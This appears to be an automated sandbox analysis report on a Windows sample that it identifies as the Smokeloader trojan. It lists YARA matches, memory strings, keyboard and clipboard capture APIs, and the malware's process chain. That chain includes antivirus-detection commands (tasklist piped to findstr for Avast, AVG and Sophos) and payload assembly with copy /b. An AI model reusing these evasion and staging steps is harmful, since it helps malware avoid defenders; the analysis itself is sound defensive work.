        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
        Source: explorer.exe, 00000011.00000002.2867686407.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
        Source: explorer.exe, 00000011.00000002.2867686407.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000011.00000000.2274432480.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
        Source: file.exe String found in binary or memory: https://www.ssl.com/repository0
        Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknown HTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49734 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        Source: Yara match File source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match File source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004056E5 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007AF7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B4F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007AF55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079A635 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007C9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B69FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

        System Summary

        Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0040259B NtEnumerateKey
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_004014B0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_004014CD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_004014E0 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_004014F3 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_004014BB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007A4763 GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00791B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0079F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0079F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B3F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406C3F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00758017
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0074E144
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0073E1F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0076A26E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007522A2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007322AD
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0074C624
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0076E87F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007BC8A4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007A2A05
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00766ADE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00798BFF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0074CD7A
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_0075CE10
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00767159
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00739240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007C5311
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_007396E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00751704
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00751A76
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00739B60
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00757B8B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00751D20
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00757DBA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 10_2_00751FE7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00758017
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0073E1F0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0076A26E
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0073226D
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007522A2
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0074C4B7
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0076E87F
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007BC8A4
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007A2A05
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00766ADE
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00798BFF
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0075CE10
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00767159
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00739240
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007C5311
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_0073D380
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_007396E0
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00751704
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00751A76
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00739B60
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00757B8B
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00751D20
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00757DBA
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif Code function: 16_2_00751FE7
        Source: C:\Windows\explorer.exe Code function: 17_2_031428D8
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF8017
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00ADE1F0
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF22A2
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AD226D
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B0A26E
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AEC4B7
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B5C8A4
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B0E87F
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B06ADE
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B42A05
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B38BFF
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AFCE10
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B07159
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AD9240
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00B65311
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AD96E0
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF1704
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF1A76
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF7B8B
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AD9B60
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF7DBA
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF1D20
        Source: C:\Users\user\AppData\Roaming\ssjhrji Code function: 19_2_00AF1FE7
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ssjhrji 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: String function: 00AEFD52 appears 32 times
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: String function: 00AF0DA0 appears 46 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 0074FD52 appears 81 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 00737873 appears 34 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 00750DA0 appears 92 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 0073B329 appears 60 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 00754CD3 appears 62 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 0073BD98 appears 33 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 0075917B appears 36 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 00763319 appears 48 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 00754D98 appears 42 times
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: String function: 007722D0 appears 55 times
        Source: file.exe | Static PE information: invalid certificate
        Source: file.exe, 00000000.00000003.1634632525.0000000002823000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeP vs file.exe
        Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000011.00000002.2865146428.0000000003141000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000010.00000002.2288921839.0000000001541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: 00000010.00000002.2288712760.0000000001510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
        Source: classification engine | Classification label: mal100.troj.evad.winEXE@25/31@6/3
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007A41FA GetLastError,FormatMessageW
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,InitOnceBeginInitialize,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_00792010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_00791A0B AdjustTokenPrivileges,CloseHandle
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_00792010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 16_2_00791A0B AdjustTokenPrivileges,CloseHandle
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B32010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
        Source: C:\Users\user\AppData\Roaming\ssjhrji | Code function: 19_2_00B31A0B AdjustTokenPrivileges,CloseHandle
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404991 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_0079DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004021AF CoCreateInstance
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Code function: 10_2_007A3A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cube
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
        Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Temp\nsxA353.tmp
        Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: file.exe | ReversingLabs: Detection: 18%
        Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
        Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Spirit Spirit.cmd & Spirit.cmd & exit
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "decentrisingadvertisementssuite" Appliance
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Annually + Protective 1151\b
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif 1151\Existence.pif 1151\b
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif
        Source: unknown | Process created: C:\Users\user\AppData\Roaming\ssjhrji C:\Users\user\AppData\Roaming\ssjhrji
